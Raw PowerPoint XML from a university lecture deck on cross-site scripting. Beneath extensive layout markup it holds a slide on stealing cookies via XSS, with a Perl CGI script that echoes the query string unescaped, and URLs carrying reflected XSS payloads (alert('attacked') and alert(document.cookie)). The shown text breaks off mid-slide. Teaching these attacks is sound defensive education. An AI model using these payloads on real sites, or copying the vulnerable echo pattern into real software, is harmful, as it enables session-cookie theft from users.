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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId19"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="280" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="285" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="290" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="288" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="276"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omic Sans MS"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Comic Sans MS"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Comic Sans MS"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Comic Sans MS"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Comic Sans MS" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Comic Sans MS" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Comic Sans MS" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Comic Sans MS" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Comic Sans MS"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clrMode="bw" frameSlides="1"/>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8690" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="121" d="100"/>
          <a:sy n="121" d="100"/>
        </p:scale>
        <p:origin x="-520" y="-80"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="132" d="100"/>
        <a:sy n="132"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handoutMaster" Target="handoutMasters/handout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C274601-3C15-C849-934A-D3B51362CB3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/17/16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E9E5B1D-BE54-7545-ABE7-B8CCFC976C08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8723559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06CA864-7BE4-664F-B69A-F275AE58EDDE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/17/16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4BD1ED8-3C9F-0749-91CF-4C82F25CEE19}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119267296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A916556-F221-6B4A-941B-C4D5E89A5658}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15850744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28CDB4-73E0-F449-8197-52C89BA2DCA4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20677183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89DF34A-A5BC-3C4A-95B7-3236D14BB8F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17959591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49D3503-C020-CD4B-BF6D-3DAB6B076F74}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25137742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FD2F09D-1D5D-E640-9131-07ADF02E5DC4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20467507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B2923BF-0F1B-BD4D-9C7C-B519A1AF0029}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1523570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31F3FB7-4444-5641-9266-5DEED5BD2EE1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33389871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8F59828-B2EB-2A4C-A94D-BEA8D363E83B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2006135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BB3A76C-7820-154F-80CA-E04A29777C4C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18804790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57906BB-6978-DD4D-8858-DAC14037CA60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264765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0843C49-99BB-A24A-B791-488380824CD9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255978143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defRPr sz="1400">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>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ctr">
              <a:defRPr sz="1400">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>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400">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{39D57118-4C32-8A46-AAC1-B8BB302803F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Comic Sans MS"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans MS"/>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cis.udel.edu/~cshen/index.php?name=HelloWorld" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld%3Cscript%3Ealert('attacked')%3C/script%3E"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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS) Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4191000"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Chien-Chung Shen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cshen@udel.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="+mn-cs"/>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534400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Stealing Cookies via XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attack (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>my $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = $ENV{QUERY_STRING};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/+/ /;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/%([a-fA-F0-9]{2,2})/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>($1))/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;!--(.|\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)*--&gt;//g;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cho back to browser a query string if it is found attached to URL received from the browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
